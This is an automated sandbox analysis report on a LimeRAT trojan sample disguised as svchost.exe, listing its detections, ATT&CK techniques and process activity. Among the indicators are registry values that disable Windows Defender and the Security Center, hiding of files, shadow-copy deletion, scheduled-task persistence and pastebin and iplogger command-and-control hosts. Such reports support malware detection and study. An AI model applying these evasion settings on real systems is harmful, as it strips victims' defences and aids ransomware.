Malware Analysis Report

2024-09-11 09:57

Sample ID 240619-1x3s8atela
Target svchost.exe
SHA256 cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
Tags
limerat defense_evasion evasion execution impact ransomware rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196

Threat Level: Known bad

The file svchost.exe was found to be: Known bad.

Malicious Activity Summary

limerat defense_evasion evasion execution impact ransomware rat trojan

Modifies visiblity of hidden/system files in Explorer

Limerat family

Contains code to disable Windows Defender

Modifies security service

LimeRAT

Modifies Windows Defender Real-time Protection settings

Modifies visibility of file extensions in Explorer

Deletes shadow copies

Executes dropped EXE

Checks computer location settings

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Files and Directories

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

System policy modification

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Disables Windows logging functionality

Interacts with shadow copies

Checks processor information in registry

Views/modifies file attributes

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Windows Management Instrumentation
T1047
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Indicator Removal
T1070
File Deletion
T1070.004
Direct Volume Access
T1006
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Inhibit System Recovery
T1490
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-19 22:02

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Limerat family

limerat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 22:02

Reported

2024-06-19 22:06

Platform

win10-20240404-en

Max time kernel

194s

Max time network

196s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A

Disables Windows logging functionality

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2324 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 4228 wrote to memory of 3852 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4228 wrote to memory of 3852 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4228 wrote to memory of 4672 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4228 wrote to memory of 4672 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2324 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
